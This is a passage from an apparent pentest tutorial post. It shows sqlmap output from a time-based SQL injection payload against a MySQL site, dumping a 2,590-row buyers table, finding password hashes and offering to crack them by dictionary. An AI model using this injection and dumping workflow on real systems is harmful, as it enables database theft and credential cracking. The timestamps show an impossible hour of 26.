    Payload: categoria=16 AND SLEEP(50)
---
[26:07:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache, Apache 2.2.23, PHP 5.2.17
back-end DBMS: MySQL 5.0
........................................INFORMATION AGAIN.........................................................
[26:07:03] [INFO] fetching entries for table 'C0mpr4d0r3s' in database 'vulnerable_database'
[26:07:03] [INFO] the SQL query used returns 2590 entries
[26:07:03] [INFO] starting 5 threads
[26:07:09] [INFO] analyzing table dump for possible password hashes
recognized possible password hashes in column 'xyt_ClaveEncriptada'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
what dictionary do you want to use?
[1] default dictionary file '/bugtraq/tools/web_audit/databases/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
..............................................................................................
..............................................................................................
..............................................................................................
..............................................................................................
[26:18:24] [INFO] table 'vulnerable_database.C0mpr4d0r3s' dumped to CSV file '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com/dump/vulnerable_database/C0mpr4d0r3s.csv'
[26:18:24] [INFO] fetched data logged to text files under '/bugtraq/tools/web_audit/databases/sqlmap/output/vulnerablesite_.com'

[*] shutting down at 26:18:24
sqlmap has an internal dictionary-based cracker; it is not very fast, but you can use it. Very soon we will crack the hashes of any database using oclHashcat-plus.
Besides this, we will see further entries about SQL injection.
That's all folks!
Categories: Pentest, SQLinjection Tags: